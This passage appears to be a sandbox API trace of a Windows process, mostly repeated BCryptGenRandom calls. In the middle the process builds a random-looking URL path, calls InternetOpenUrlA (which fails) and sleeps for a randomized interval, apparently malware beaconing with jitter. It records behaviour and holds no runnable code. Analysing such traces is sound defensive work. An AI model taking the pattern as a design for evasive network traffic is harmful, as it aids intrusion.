(hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.231] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.231] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.231] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.231] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.231] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.232] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.232] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.232] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.232] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.232] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.232] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.232] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.232] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.232] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.233] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.233] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.233] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.233] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.233] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.233] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.233] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.234] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.234] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.234] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.234] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.234] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.234] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.234] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.234] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.235] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.235] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.235] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.235] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.235] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.235] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.235] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.235] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.236] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.236] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.236] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.236] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.236] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.236] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.236] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.236] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.237] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.237] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.237] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.237] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.237] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.237] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.237] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.238] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0172.238] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.238] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.238] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.238] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0172.238] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.238] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a17255, cbBuffer=0x18, dwFlags=0x2 | out: pbBuffer=0x3a17255) returned 0x0 [0172.238] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.239] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.239] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.239] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.239] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.239] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.239] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.239] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.240] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.240] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.240] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.240] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.240] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.240] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.240] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.240] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.241] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.241] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.241] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.241] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.241] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.241] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.241] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.241] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.242] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.242] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.242] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.242] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.242] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.242] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.242] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.242] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.242] GetProcessHeap () returned 0x440000 [0172.242] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473770 [0172.242] lstrcpyA (in: lpString1=0x473770, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0172.243] lstrcatA (in: lpString1="\x04", lpString2="/ytmj820wrh32e8ebUX8xfb07gYgwnc63S2mv/AofbI50Yz4W74jd4dwbm9rQV044BXhx0a5tGvysne0tVqG/7HjloIqpLhyA1tbphvopk3k/" | out: lpString1="\x04/ytmj820wrh32e8ebUX8xfb07gYgwnc63S2mv/AofbI50Yz4W74jd4dwbm9rQV044BXhx0a5tGvysne0tVqG/7HjloIqpLhyA1tbphvopk3k/") returned="\x04/ytmj820wrh32e8ebUX8xfb07gYgwnc63S2mv/AofbI50Yz4W74jd4dwbm9rQV044BXhx0a5tGvysne0tVqG/7HjloIqpLhyA1tbphvopk3k/" [0172.243] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0172.243] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/ytmj820wrh32e8ebUX8xfb07gYgwnc63S2mv/AofbI50Yz4W74jd4dwbm9rQV044BXhx0a5tGvysne0tVqG/7HjloIqpLhyA1tbphvopk3k/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0172.243] GetProcessHeap () returned 0x440000 [0172.243] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473770 | out: hHeap=0x440000) returned 1 [0172.421] GetProcessHeap () returned 0x440000 [0172.421] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a17200 | out: hHeap=0x440000) returned 1 [0172.421] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0172.421] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0172.422] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.422] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0172.422] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0172.422] Sleep (dwMilliseconds=0x18afc) [0172.598] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.599] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0172.599] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.599] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0172.599] GetProcessHeap () returned 0x440000 [0172.599] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x95) returned 0x3a169e0 [0172.599] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.599] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0172.599] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.599] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a169e1, cbBuffer=0x22, dwFlags=0x2 | out: pbBuffer=0x3a169e1) returned 0x0 [0172.599] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.599] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.599] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.599] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.600] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.600] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.600] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.600] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.600] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.600] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.600] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.600] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.600] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.600] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.600] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.600] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.600] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.601] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.601] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.601] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.601] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.601] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.601] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.601] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.601] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.601] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.601] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.601] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.601] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.602] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.602] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.602] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.602] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.602] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.602] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.602] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.602] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.602] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.602] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.602] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.603] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.603] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.603] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.603] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.603] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.603] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.603] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.603] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.603] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.603] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.603] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.603] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.604] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.604] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.604] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.604] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.604] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.604] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.604] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.604] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0172.604] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.604] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16a03, cbBuffer=0x13, dwFlags=0x2 | out: pbBuffer=0x3a16a03) returned 0x0 [0172.604] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.604] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.604] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.605] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.605] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.605] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.605] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.605] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.605] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.605] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0172.605] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.605] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.606] GetProcAddress (hModule=0x7ffc5bcc0000, 